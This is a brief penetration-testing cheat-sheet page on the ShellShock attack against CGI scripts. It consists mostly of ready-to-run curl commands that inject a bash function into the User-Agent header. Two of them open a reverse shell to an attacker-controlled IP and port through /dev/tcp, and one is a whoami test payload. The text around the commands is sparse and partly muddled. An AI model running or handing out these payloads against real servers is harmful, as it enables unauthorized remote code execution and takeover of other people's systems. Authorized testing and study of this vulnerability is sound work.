ShellShock Attack
Last updated
Last updated
While logging into a web we can find an CGI extension or something similar. Ex:
https://vuln-site.com/session_login.cgl
Other way is sending the same petition while listening with netcat without manipulating the User Agent:
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/{My IP}/{PORT} 0>&1""https://vuln-site.com/cgi-bin/recurso.cgi"
curl --silent -X GET http://vuln-site.com/cgi-bin/user.sh -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/{My IP}/{PORT} 0>&1"
To test this before try getting a reverse shell:
-H "User-Agent: () { :; };echo; /usr/bin/whoami"